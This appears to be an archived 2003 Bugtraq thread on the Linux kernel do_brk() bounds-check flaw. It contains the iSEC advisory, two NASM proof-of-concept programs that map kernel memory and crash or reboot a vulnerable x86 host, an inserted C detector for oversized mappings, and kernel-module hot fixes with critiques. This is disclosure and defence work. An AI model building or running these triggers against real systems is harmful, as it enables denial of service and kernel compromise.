11045808 2003-12-02 03:16 +0000 /89 lines/ Christophe Devine <DEVINE@iie.cnam.fr>
Imported: 2003-12-02 17:59 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <30127>
Subject: Linux kernel do_brk() proof-of-concept exploit code
------------------------------------------------------------
From: Christophe Devine <DEVINE@iie.cnam.fr>
To: bugtraq@securityfocus.com
Message-ID: <Pine.VMS.3.91-b11-vms.1031202031221.13520A-100000@speedy.iie.cnam.fr>

The following program can be used to test if an x86 Linux system
is vulnerable to the do_brk() exploit; use at your own risk.

$ nasm brk_poc.asm -o a.out
$ chmod 755 a.out
$ uname -a
Linux test3 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1698
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860     /tmp/a.out
c0000000-c0003000 rwxp 00000000 00:00 0

(system reboots when the program exits)

$ uname -a
Linux test3 2.4.23 #1 Mon Dec 1 22:18:25 CET 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1591
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860     /tmp/a.out

(the program exits gracefully)

$ cat brk_poc.asm

; ref.: http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html

BITS 32

                org     0xBFFFF000

ehdr:                                           ; Elf32_Ehdr
                db      0x7F, "ELF", 1, 1, 1    ;   e_ident
        times 9 db      0
                dw      2                       ;   e_type
                dw      3                       ;   e_machine
                dd      1                       ;   e_version
                dd      _start                  ;   e_entry
                dd      phdr - $$               ;   e_phoff
                dd      0                       ;   e_shoff
                dd      0                       ;   e_flags
                dw      ehdrsize                ;   e_ehsize
                dw      phdrsize                ;   e_phentsize
                dw      1                       ;   e_phnum
                dw      0                       ;   e_shentsize
                dw      0                       ;   e_shnum
                dw      0                       ;   e_shstrndx

ehdrsize        equ     $ - ehdr

phdr:                                           ; Elf32_Phdr
                dd      1                       ;   p_type
                dd      0                       ;   p_offset
                dd      $$                      ;   p_vaddr
                dd      $$                      ;   p_paddr
                dd      filesize                ;   p_filesz
                dd      0x4000                  ;   p_memsz (larger than p_filesz: the loader
                                                ;   calls do_brk() for the remainder)
                dd      7                       ;   p_flags
                dd      0x1000                  ;   p_align

phdrsize        equ     $ - phdr

_start:
                mov     eax, 162                ; nanosleep(&timespec, NULL)
                mov     ebx, timespec
                int     0x80

                mov     eax, 1                  ; exit(0)
                mov     ebx, 0
                int     0x80

timespec        dd      20, 0

filesize        equ     $ - $$

--
Christophe Devine - http://www.cr0.net:8040/about/

(11045808) /Christophe Devine <DEVINE@iie.cnam.fr>/
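The two /proc/<pid>/maps listings above are the observable difference between a vulnerable and a fixed kernel: on the 2.4.22 box a VMA ends above TASK_SIZE (0xC0000000 on a 3G/1G x86 split), on 2.4.23 it does not. The following C program is an added example and not part of this post or of any code in the thread. It counts mappings whose end lies above that limit, using the two listings above as constructed sample input (it would likewise flag the 080a5000-c891d000 mapping shown in the iSEC advisory later in the thread), can be pointed at a live PID, and also contains brk_request_ok(), a user-space model of the bound check the fixed kernel performs, including the wrap-around clause. The TASK_SIZE value, the page size of 4 KiB and the sample lines are assumptions taken from the thread, not read from a running kernel.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* 3 GiB user / 1 GiB kernel split of the x86 kernels discussed in this thread. */
#define X86_TASK_SIZE 0xC0000000UL

/* Constructed sample input: the two listings from the post above. */
static const char VULNERABLE_MAPS[] =
    "bffff000-c0000000 rwxp 00000000 03:03 376860     /tmp/a.out\n"
    "c0000000-c0003000 rwxp 00000000 00:00 0\n";
static const char PATCHED_MAPS[] =
    "bffff000-c0000000 rwxp 00000000 03:03 376860     /tmp/a.out\n";

/* Parse "start-end ..." from one maps line. Returns 1 on success. */
int parse_maps_line(const char *line, unsigned long *start, unsigned long *end)
{
    return sscanf(line, "%lx-%lx", start, end) == 2;
}

/* A user VMA can never legitimately end above task_size (or be inverted). */
int vma_is_suspicious(unsigned long start, unsigned long end, unsigned long task_size)
{
    return end > task_size || end < start;
}

/* Model of the bound check the fixed kernel applies before do_brk() extends a
 * process: page-align the length and reject a range that ends above task_size
 * or wraps. 32-bit arithmetic is used on purpose so the wrap case is visible
 * on a 64-bit host as well. Returns 1 if the request is acceptable. */
int brk_request_ok(uint32_t addr, uint32_t len, uint32_t task_size)
{
    uint32_t end;
    len = (len + 0xfffu) & ~0xfffu;      /* PAGE_ALIGN for 4 KiB pages */
    if (len == 0)
        return 1;                        /* nothing to map; the kernel just returns addr */
    end = addr + len;                    /* may wrap around */
    return !(end > task_size || end < addr);
}

/* Count suspicious VMAs in a maps-format text buffer. */
int count_suspicious_vmas(const char *maps, unsigned long task_size)
{
    const char *p = maps;
    char line[1024];
    unsigned long s, e;
    int hits = 0;

    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        if (parse_maps_line(line, &s, &e) && vma_is_suspicious(s, e, task_size))
            hits++;
        p = nl ? nl + 1 : p + len;
    }
    return hits;
}

/* Scan a live process's maps file. Returns the hit count, or -1 if unreadable. */
int scan_pid_maps(const char *pid, unsigned long task_size)
{
    char path[64], line[1024];
    unsigned long s, e;
    int hits = 0;
    FILE *f;

    snprintf(path, sizeof path, "/proc/%s/maps", pid);
    f = fopen(path, "r");
    if (!f)
        return -1;
    while (fgets(line, sizeof line, f))
        if (parse_maps_line(line, &s, &e) && vma_is_suspicious(s, e, task_size))
            hits++;
    fclose(f);
    return hits;
}

int main(int argc, char **argv)
{
    if (argc > 1) {                      /* usage: ./maps_check <pid> */
        int hits = scan_pid_maps(argv[1], X86_TASK_SIZE);
        if (hits < 0) {
            perror("open maps");
            return 1;
        }
        printf("pid %s: %d VMA(s) reaching above 0x%lx\n", argv[1], hits, X86_TASK_SIZE);
        return hits ? 2 : 0;
    }
    printf("vulnerable sample: %d hit(s)\n", count_suspicious_vmas(VULNERABLE_MAPS, X86_TASK_SIZE));
    printf("patched sample:    %d hit(s)\n", count_suspicious_vmas(PATCHED_MAPS, X86_TASK_SIZE));
    /* Roughly the request the ELF loader makes for the PoC's oversized p_memsz. */
    printf("PoC bss request accepted by the fixed check: %d\n",
           brk_request_ok(0xBFFFF000u, 0x4000u, (uint32_t)X86_TASK_SIZE));
    return 0;
}
```

Without an argument the program runs over the embedded samples; with a PID it reads /proc/<pid>/maps and exits 2 if any mapping reaches into the kernel half, which makes it usable in a cron-driven sweep over all processes on a 3G/1G x86 host.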
Comment in text 11046081 by Calum <bugtraq@umtstrial.co.uk>

11046081 2003-12-02 17:21 +0000 /26 lines/ Calum <bugtraq@umtstrial.co.uk>
Imported: 2003-12-02 19:43 by Brevbäraren
External recipient: Christophe Devine <DEVINE@iie.cnam.fr>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <30134>
Comment to text 11045808 by Christophe Devine <DEVINE@iie.cnam.fr>
Subject: Re: Linux kernel do_brk() proof-of-concept exploit code
------------------------------------------------------------
From: Calum <bugtraq@umtstrial.co.uk>
To: Christophe Devine <DEVINE@iie.cnam.fr>
Cc: bugtraq@securityfocus.com
Message-ID: <200312021721.13324.bugtraq@umtstrial.co.uk>

On Tuesday 02 December 2003 3:16 am, Christophe Devine wrote:
> The following program can be used to test if an x86 Linux system
> is vulnerable to the do_brk() exploit; use at your own risk.

This POC code needs nasm greater than 0.98.36, otherwise you get the
following error when trying to compile it.

exploit@womble exploit $ nasm -v
NASM version 0.98.36 compiled on Jul 17 2003
exploit@womble exploit $ nasm brk_poc.asm -o a.out
brk_poc.asm:5: error: attempt to set a negative program origin

It works with 0.98.38.

--
The early bird may get the worm, but the second mouse gets the cheese.
http://gk.umtstrial.co.uk/~calum/

(11046081) /Calum <bugtraq@umtstrial.co.uk>/

11046011 2003-12-02 00:26 +0100 /138 lines/ Paul Starzetz <ihaquer@isec.pl>
Imported: 2003-12-02 19:08 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: vendor-sec <vendor-sec@lst.de>
External CC recipient: vulnwatch@vulnwatch.org
External reply-to: security@isec.pl
Recipient: Bugtraq (import) <30131>
Subject: [iSEC] Linux kernel do_brk() lacks argument bound checking
------------------------------------------------------------
From: Paul Starzetz <ihaquer@isec.pl>
To: bugtraq@securityfocus.com
Cc: vendor-sec <vendor-sec@lst.de>, <vulnwatch@vulnwatch.org>
Message-ID: <Pine.LNX.4.44.0312020005180.31975-100000@isec.pl>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Synopsis:  Linux kernel do_brk() lacks argument bound checking
Product:   Linux
Version:   up to 2.4.23, others
Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0012-do_brk.txt
CVE:       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0961
Author:    Paul Starzetz <ihaquer@isec.pl>
           Wojciech Purczynski <cliph@isec.pl>
Date:      December 1, 2003

Issue:
======

A critical security bug has been discovered in the Linux kernel within the
do_brk() function that may lead to full compromise of a vulnerable system.

Details:
========

The physical memory of an x86 machine running one of the recent Linux
kernels is managed in a simplified flat memory model. Each user process
may address memory ranging from 0 up to TASK_SIZE bytes. Memory above
this limit is not accessible to the user and contains kernel code with
its data structures.

A user process is divided into logical sections, called virtual memory
areas. The kernel keeps track of and manages the user process's virtual
memory areas to provide proper memory management and memory protection
fault handling. More details of Linux memory management are out of the
scope of this article and can be found in [3].
do_brk() is an internal kernel function that is called indirectly to
manage the process's memory heap (brk), growing or shrinking it
accordingly. It is a simplified version of the mmap(2) system call that
only handles anonymous mappings (i.e. not initialized data).

The function lacks bound checks of its parameters and may be exploited
to create an arbitrarily large virtual memory area, exceeding the user
accessible memory limit. Thus, the kernel memory above this limit may
become part of the user process's memory as visible to the kernel memory
manager.

The typical memory layout of a user process may look like:

bash$ cat /proc/self/maps
08048000-0804c000 r-xp 00000000 03:02 207935     /bin/cat
0804c000-0804d000 rw-p 00003000 03:02 207935     /bin/cat
0804d000-0804e000 rwxp 00000000 00:00 0
40000000-40015000 r-xp 00000000 03:02 207495     /lib/ld-2.3.2.so
40015000-40016000 rw-p 00014000 03:02 207495     /lib/ld-2.3.2.so
40016000-40017000 rw-p 00000000 00:00 0
40020000-40021000 rw-p 00000000 00:00 0
42000000-4212f000 r-xp 00000000 03:02 319985     /lib/tls/libc-2.3.2.so
4212f000-42132000 rw-p 0012f000 03:02 319985     /lib/tls/libc-2.3.2.so
42132000-42134000 rw-p 00000000 00:00 0
bfffe000-c0000000 rwxp fffff000 00:00 0

The do_brk() function is called from within the ELF and a.out loaders as
well as from the brk(2) syscall. These are three different vectors which
may be used to exploit the do_brk() bug.

After successful exploitation the process memory may contain a large
memory mapping, i.e.:

080a5000-c891d000 rwxp 00000000 00:00 0

Impact:
=======

Successful exploitation of do_brk() leads to full compromise of the
vulnerable system, including gaining full uid 0 privileges, the
possibility of kernel code and data structure modification as well as
kernel-level (ring0) code execution.

Tested and successfully exploited kernel versions include:

 o 2.4.20-18.9 as shipped with RedHat 9.0
 o 2.4.22 (vanilla)
 o 2.4.22 with grsecurity patch

There is no known reliable workaround for this vulnerability except.
We recommend upgrading to the most recent kernel version (so far the
2.4.23 kernel) on all vulnerable systems.

Limiting the maximum size of the user process's data segment with the
ulimit -d command provides some workaround for exploits based on the brk
system call. However, there are at least two other attack vectors that
can not be disabled without patching the system.

We have successfully created a proof-of-concept exploit. Unfortunately
we guess that our exploit may have leaked to the underground.

Credits:
========

Paul Starzetz <ihaquer@isec.pl> has independently discovered the bug,
Wojciech Purczynski <cliph@isec.pl> invented and provided numerous
techniques to automatically and efficiently exploit the bug.

References:
===========

[1] Intel Architecture Software Developer's Manual Volume 2
    "Instruction Set Reference"
[2] Intel Architecture Software Developer's Manual Volume 3
    "System Programming Guide"
[3] Daniel P. Bovet, Marco Cesati, "Understanding the Linux Kernel"

- --
Paul Starzetz
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE/y8jRC+8U3Z5wpu4RAnHvAKDEC0/e5xr7s61wMSsr4XUDl5+S8ACfQTqe
CsfpNtUMoLW7xDS22JSAJP0=
=dpRp
-----END PGP SIGNATURE-----

(11046011) /Paul Starzetz <ihaquer@isec.pl>/

11056205 2003-12-04 16:35 +0100 /23 lines/ Julien TINNES <julien@cr0.org>
Imported: 2003-12-04 20:42 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <30180>
Subject: Linux kernel do_brk(), another proof-of-concept code for i386
------------------------------------------------------------
From: Julien TINNES <julien@cr0.org>
To: bugtraq@securityfocus.com
Message-ID: <200312041635.43654.julien@cr0.org>

There were complaints that the previous POC wasn't working on some
kernels, and I even saw a guy on IRC asking about a POC using a
different method.

The previous version was relying on the Linux ELF loader to call do_brk
for us.
This one uses sys_brk(), but to bypass a check of available memory in
sys_brk we still have to map our code high in memory (but not past
PAGE_OFFSET this time).

To be able to call sys_brk with success we had to make sure the stack
wasn't above our program (in most cases we have to move it).

Then you can easily crash your system (do a fork(), clone(),
execve()...), doing something else isn't trivial :p

Use NASM 0.98.38 or higher to compile.

Julien TINNES

(11056205) /Julien TINNES <julien@cr0.org>/
Attachment (text/plain) in text 11056206

11056206 2003-12-04 16:35 +0100 /101 lines/ Julien TINNES <julien@cr0.org>
Attachment filename: "brk_poc_sys_brk.asm"
Imported: 2003-12-04 20:42 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <30181>
Attachment (text/plain) to text 11056205
Subject: Attachment (brk_poc_sys_brk.asm) to: Linux kernel do_brk(), another proof-of-concept code for i386
------------------------------------------------------------

; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at cr0.org)
;
; This exploit uses sys_brk directly to expand its break and doesn't rely
; on the ELF loader to do it.
;
; To bypass a check in sys_brk against available memory, we use a high
; virtual address as base address
;
; In most cases (let's say when no PaX w/ ASLR :) we have to move the stack
; so that we can expand our break
;

BITS 32

                org     0xBFFF0000

ehdr:                                           ; Elf32_Ehdr
                db      0x7F, "ELF", 1, 1, 1    ;   e_ident
        times 9 db      0
                dw      2                       ;   e_type
                dw      3                       ;   e_machine
                dd      1                       ;   e_version
                dd      _start                  ;   e_entry
                dd      phdr - $$               ;   e_phoff
                dd      0                       ;   e_shoff
                dd      0                       ;   e_flags
                dw      ehdrsize                ;   e_ehsize
                dw      phdrsize                ;   e_phentsize
                dw      2                       ;   e_phnum
                dw      0                       ;   e_shentsize
                dw      0                       ;   e_shnum
                dw      0                       ;   e_shstrndx

ehdrsize        equ     $ - ehdr

phdr:                                           ; Elf32_Phdr
                dd      1                       ;   p_type
                dd      0                       ;   p_offset
                dd      $$                      ;   p_vaddr
                dd      $$                      ;   p_paddr
                dd      filesize                ;   p_filesz
                dd      filesize                ;   p_memsz
                dd      7                       ;   p_flags
                dd      0x1000                  ;   p_align

phdrsize        equ     $ - phdr

_start:
                ; ** Make sure the stack is not above us
                mov     eax, 163                ; mremap
                mov     ebx, esp
                and     ebx, ~(0x1000 - 1)      ; align to page size
                mov     ecx, 0x1000             ; we suppose the stack is one page only
                mov     edx, 0x9000             ; be sure it can't get mapped after us
                mov     esi, 1                  ; MREMAP_MAYMOVE
                int     0x80

                and     esp, (0x1000 - 1)       ; offset in page
                add     esp, eax                ; stack ptr to new location
                                                ; nb: we don't fix pointers, so
                                                ; environ/cmdline are not available

                mov     eax, 152                ; mlockall (for tests as root)
                mov     ebx, 2                  ; MCL_FUTURE
                int     0x80

                ; get VMAs for the kernel memory
                mov     eax, 45                 ; brk
                mov     ebx, 0xC0500000
                int     0x80

                mov     ecx, 4
loop0:
                mov     eax, 2                  ; fork
                int     0x80
                loop    loop0

_idle:
                mov     eax, 162                ; nanosleep
                mov     ebx, timespec
                int     0x80
                jmp     _idle

timespec        dd      10, 0

filesize        equ     $ - $$

(11056206) /Julien TINNES <julien@cr0.org>/

11060599 2003-12-05 00:04 +0100 /37 lines/ Paul Starzetz <paul@isec.pl>
Imported: 2003-12-05 20:23 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External recipient: vulnwatch@vulnwatch.org
External recipient: full-disclosure@lists.netsys.com
External reply-to: security@isec.pl
Recipient: Bugtraq (import) <30194>
Subject: [iSEC] Linux kernel do_brk() vulnerability details
------------------------------------------------------------
From: Paul Starzetz <paul@isec.pl>
To: bugtraq@securityfocus.com, <vulnwatch@vulnwatch.org>, <full-disclosure@lists.netsys.com>
Message-ID: <Pine.LNX.4.44.0312042358340.26831-100000@isec.pl>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

We have released a paper covering technical details of the do_brk() bug
and the results of our research done while writing the exploit code. It
also describes the numerous techniques we have used to create a very
effective exploit code that leads to full privilege escalation even on
systems running a kernel secured with various security patches.

It can be found at:

http://isec.pl/papers/linux_kernel_do_brk.pdf

Regards,

- --
Paul Starzetz
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE/z7vdC+8U3Z5wpu4RAkP0AKDH0sNST6CjjTmIfGTSETSAa922hgCfR3mz
tSWdaV41pn1zznrPb/8lQtA=
=VOlJ
-----END PGP SIGNATURE-----

(11060599) /Paul Starzetz <paul@isec.pl>/

11060606 2003-12-04 15:41 -0800 /176 lines/ <canon@nersc.gov>
Imported: 2003-12-05 20:27 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <30195>
Subject: Hot fix for do_brk bug
------------------------------------------------------------
From: canon@nersc.gov
To: bugtraq@securityfocus.com
Message-ID: <200312042341.hB4Nfbmd005154@pookie.nersc.gov>

Greetings,

I've written a Linux kernel module that can be used to hot fix a Linux
system for the bug in do_brk. It scans the kernel space and replaces
jmp and calls to do_brk to point to a wrapper routine instead. It also
maps the symbol table to point to the wrapper. This only works on x86
and it has only been tested with RH kernels 2.4.18-27.7.xsmp and
2.4.20-20.7smp. It is quite possible this could crash or screw-up a
system, so use at your own risk. I've tested the module against the
proof of concept code written and posted by Christophe Devine. The
module catches the exploit and logs the attempt.
--Shane Canon

------brk_fix.c------------
#define MODULE
#define __KERNEL__

/* some constants used in our module */
#define MODULE_NAME "brk_fix"
#define MODULE_VERSION "0.01"

/* brk_fix
 * Version: 0.01
 *
 * WARNING WARNING WARNING
 * This module intentionally modifies kernel memory.
 * This module could potentially crash or damage your system.
 * Use at your own risk.
 *
 * Hot fix for integer overflow in do_brk
 *
 * This module scans kernel code space looking for jumps and calls
 * to do_brk.  It then changes these calls to instead call my_brk,
 * which is a wrapper routine that does some checks before calling do_brk.
 * The module also scans for the address of do_brk and replaces it
 * with my_brk.  This would mainly occur in the exported symbols table.
 *
 * This has been tested with RH 2.4.20-20.7smp and RH 2.4.18-27.7.xsmp on i686
 *
 * Sample use...
 *  gcc -O3 -I/lib/modules/`uname -r`/build/include -c -o brk_fix.o brk_fix.c
 *  insmod ./brk_fix.o
 *
 * Written by Shane Canon <canon@nersc.gov>
 * (c) Copyright 2003 Regents of the University of California
 * All rights reserved.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/version.h>
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/mm.h>          /* do_brk() prototype, PAGE_ALIGN(), TASK_SIZE */

extern void * __start___kallsyms;

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,4,9)
#ifdef MODULE_LICENSE
MODULE_LICENSE("GPL");
#endif
#endif

unsigned long my_brk(unsigned long addr, unsigned long len);

int init_module(void)
{
    unsigned char *ptr;
    unsigned char *newptr;
    long *lptr;
    unsigned char *cptr;
    unsigned char *next;
    int count=0;
    unsigned char *start=(unsigned char *) (TASK_SIZE);      /* Start at the beginning of kernel space */
    unsigned char *end=(unsigned char *)&__start___kallsyms; /* Want something that is well past the kernel text */
                                                             /* This seems to fit the bill */

    ptr=(unsigned char *)(do_brk);     /* We are looking for calls/jumps to this function */
    newptr=(unsigned char *)(my_brk);  /* This is what we will change it to */

    for (cptr=start;cptr+4<=end;cptr++){     /* Let's scan all of kernel space (a dword must remain readable) */
        if (*cptr==0xe8||*cptr==0xe9){       /* Look for calls or jumps (rel32 forms) */
            lptr=(long *)(cptr+1);           /* If you find one, look at the next dword... */
            next=cptr+5;                     /* ...which is relative to the following instruction */
            if ((next+*lptr)==(ptr)){        /* See if the offset would point to do_brk */
                printk("fixing 0x%08lx\n",(unsigned long)lptr); /* If so, change it to our new routine */
                *lptr=(newptr-next);
                count++;
            }
            cptr=next-1;                     /* Skip the displacement; the loop's cptr++ lands on the next byte */
        }
        else{
            lptr=(long *)cptr;               /* Look for the address as well.  This would show */
            if ((unsigned char*)(*lptr)==ptr){ /* up in the symbol table. */
                printk("Fixing address at 0x%08lx\n",(unsigned long)lptr);
                *lptr=(long)(newptr);
                count++;
            }
        }
    }
    printk ("Fix brk installed, %d location(s) patched.\n",count); /* All done. */
    MOD_INC_USE_COUNT;       /* We can't unload this one.  So let's inc the mod */
                             /* count and leave it there. */
    return 0;                /* success */
}

void cleanup_module(void)
{
    /* Can't remove it */
}

/* These are the first couple of lines from the patched mmap.c */
/* Do the new checks and then call the original do_brk */
unsigned long my_brk(unsigned long addr, unsigned long len)
{
    len = PAGE_ALIGN(len);
    if (!len)
        return addr;
    if ((addr + len) > TASK_SIZE || (addr + len) < addr){ /* Let's make sure it's in bounds */
        printk("caught do_brk exploit!!!\n");
        return -EINVAL;
    }
    return do_brk(addr,len);   /* Call the real do_brk */
}
-------end---------

------------------------------------------------------------------------
Shane Canon
National Energy Research Scientific Computing Center
------------------------------------------------------------------------

(11060606) /<canon@nersc.gov>/
Comment in text 11061107 by Goetz Babin-Ebell <babin-ebell@trustcenter.de>

11061107 2003-12-05 22:31 +0100 /37 lines/ Goetz Babin-Ebell <babin-ebell@trustcenter.de>
Imported: 2003-12-05 23:45 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <30219>
Comment to text 11060606 by <canon@nersc.gov>
Subject: Re: Hot fix for do_brk bug
------------------------------------------------------------
From: Goetz Babin-Ebell <babin-ebell@trustcenter.de>
To: bugtraq@securityfocus.com
Message-ID: <3FD0F92F.6090909@trustcenter.de>

Hello Shane,

canon@nersc.gov wrote:
> I've written a linux kernel module that can be used to hot fix a
> Linux system for the bug in do_brk. It scans the
> kernel space and replaces jmp and calls to do_brk
> to point to a wrapper routine instead. It also maps
> the symbol table to point to the wrapper. This only
> works on x86 and it has only been tested with RH kernels
> 2.4.18-27.7.xsmp and 2.4.20-20.7smp. It is quite possible
> this could crash or screw-up a system, so use at your own
> risk. I've tested the module against the proof of concept code
> written and posted by Christophe Devine. The module catches
> the exploit and logs the attempt.

It would be less intrusive to the kernel to supply a fixed do_brk()
and replace the do_brk with a jump to your version.

This way you only have to touch one place
in the kernel space (and no guesswork, no modification
of kernel data that might look like a pointer to do_brk()
but is really something else...)

Bye

Goetz

--
Goetz Babin-Ebell, TC TrustCenter AG, http://www.trustcenter.de
Sonninstr. 24-28, 20097 Hamburg, Germany
Tel.: +49-(0)40 80 80 26 -0, Fax: +49-(0)40 80 80 26 -126

(11061107) /Goetz Babin-Ebell <babin-ebell@trustcenter.de>/
Attachment (application/x-pkcs7-signature) in text 11061108
Comment in text 11061140 by Gunnar Wolf <gwolf@gwolf.cx>
Comment in text 11070717 by Pavel harry_x Palát <harry_x@babylon5.cz>

11061108 2003-12-05 22:31 +0100 /14 lines/ Goetz Babin-Ebell <babin-ebell@trustcenter.de>
Attachment filename: "smime.p7s"
Imported: 2003-12-05 23:45 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <30220>
Attachment (application/x-pkcs7-signature) to text 11061107
Subject: Attachment (smime.p7s) to: Re: Hot fix for do_brk bug
------------------------------------------------------------
[binary S/MIME signature data omitted]
(11061108) /Goetz Babin-Ebell <babin-ebell@trustcenter.de>/

11061140 2003-12-05 16:41 -0600 /45 lines/ Gunnar Wolf <gwolf@gwolf.cx>
Imported: 2003-12-05 23:53 by Brevbäraren
External recipient: Goetz Babin-Ebell <babin-ebell@trustcenter.de>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <30221>
Comment to text 11061107 by Goetz Babin-Ebell <babin-ebell@trustcenter.de>
Subject: Re: Hot fix for do_brk bug
------------------------------------------------------------
From: Gunnar Wolf <gwolf@gwolf.cx>
To: Goetz Babin-Ebell <babin-ebell@trustcenter.de>
Cc: bugtraq@securityfocus.com
Message-ID: <20031205224124.GM4654@gwolf.cx>

Goetz Babin-Ebell wrote [Fri, Dec 05, 2003 at 10:31:27PM +0100]:
> >I've written a linux kernel module that can be used to hot fix a
> >Linux system for the bug in do_brk. It scans the
> >kernel space and replaces jmp and calls to do_brk
> >to point to a wrapper routine instead. It also maps
> >the symbol table to point to the wrapper. This only
> >works on x86 and it has only been tested with RH kernels
> >2.4.18-27.7.xsmp and 2.4.20-20.7smp. It is quite possible
> >this could crash or screw-up a system, so use at your own
> >risk. I've tested the module against the proof of concept code
> >written and posted by Christophe Devine. The module catches
> >the exploit and logs the attempt.
>
> It would be less intrusive to the kernel to supply a fixed do_brk()
> and replace the do_brk with a jump to your version.
>
> This way you only have to touch one place
> in the kernel space (and no guesswork, no modify
> of kernel data that might look like a pointer to do_brk()
> but is really something else...)

Not only that - in order to be really effective, the hotfix would have
to remain active and check each module loaded into the kernel, as
modules might point to the real do_brk() call. Yes, it becomes _much_
harder for an intruder to exploit it, but the patch is not perfect.
...But anyway, it is quite welcome, a very valuable work. Of course, the
only way out of trouble is to install a new kernel. Sadly, many people
handle uptimes as pissing contests and disregard updating their systems.

Greetings,

--
Gunnar Wolf - gwolf@gwolf.cx - (+52-55)5630-9700 ext. 1366
PGP key 1024D/8BB527AF 2001-10-23
Fingerprint: 0C79 D2D1 2C4E 9CE4 5973 F800 D80E F35A 8BB5 27AF

(11061140) /Gunnar Wolf <gwolf@gwolf.cx>/

11070717 2003-12-06 19:51 +0100 /28 lines/ Pavel harry_x Palát <harry_x@babylon5.cz>
Imported: 2003-12-08 18:18 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <30227>
Comment to text 11061107 by Goetz Babin-Ebell <babin-ebell@trustcenter.de>
Subject: Re: Hot fix for do_brk bug
------------------------------------------------------------
From: Pavel harry_x Palát <harry_x@babylon5.cz>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.58.0312061927050.7490@orodruina.lan>

> It would be less intrusive to the kernel to supply a fixed do_brk()
> and replace the do_brk with a jump to your version.

I've written a similar patch a few days ago. The patch only modifies the
first instructions of do_brk() (it replaces them with a jmp to a function
in the LKM). It can be downloaded from http://wizard.ath.cx/fixbrk.tar.gz

But beware, I wrote it in a rush and it's pretty oddly written :-) But it
worked on my two servers (both were running the 2.4.21 kernel with the
grsecurity patch).

Greetings

Pavel Palát

--
Pavel "harry_x" Palát
harry_x@babylon5.cz
irc: #mistral.cz on IRCnet

The only way of finding the limits to the possible is by going beyond them to the impossible
Arthur C. Clark

(11070717) /Pavel harry_x Palát <harry_x@babylon5.cz>/
Comment in text 11076067 by Mariusz Woloszyn <emsi@ipartners.pl>
Comment in text 11077131 by <canon@nersc.gov>

11076067 2003-12-09 19:24 +0100 /42 lines/ Mariusz Woloszyn <emsi@ipartners.pl>
Imported: 2003-12-09 20:39 by Brevbäraren
External recipient: Pavel harry_x Palát <harry_x@babylon5.cz>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <30251>
Comment to text 11070717 by Pavel harry_x Palát <harry_x@babylon5.cz>
Subject: Re: Hot fix for do_brk bug
------------------------------------------------------------
From: Mariusz Woloszyn <emsi@ipartners.pl>
To: Pavel harry_x Palát <harry_x@babylon5.cz>
Cc: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.58.0312091918190.30123@dzyngiel.ipartners.pl>

On Sat, 6 Dec 2003, Pavel harry_x Palát wrote:

> > It would be less intrusive to the kernel to supply a fixed do_brk()
> > and replace the do_brk with a jump to your version.
>
> I've written a similar patch a few days ago. The patch only modifies the
> first instructions of do_brk() (it replaces them with a jmp to a function
> in the LKM). It can be downloaded from http://wizard.ath.cx/fixbrk.tar.gz
>
> But beware, I wrote it in a rush and it's pretty oddly written :-) But it
> worked on my two servers (both were running the 2.4.21 kernel with the
> grsecurity patch).
>

Sometimes it might be valuable to patch your fixbrk.pl. Your version
does:

system("gcc -D__KERNEL__ -DMODULE -c -o _fixbrk.o fixbrk.c");

On some hosts, to compile this module you need to specify the path to
the kernel header files.
For example:

system("gcc -D__KERNEL__ -DMODULE -I/usr/src/linux/include -c -o _fixbrk.o fixbrk.c");

Otherwise you might end up with something like:

/usr/include/asm/processor.h:56: error: `CONFIG_X86_L1_CACHE_SHIFT' undeclared here (not in a function)

Regards,

--
Mariusz Wołoszyn
Internet Security Specialist, GTS - Internet Partners

(11076067) /Mariusz Woloszyn <emsi@ipartners.pl>/

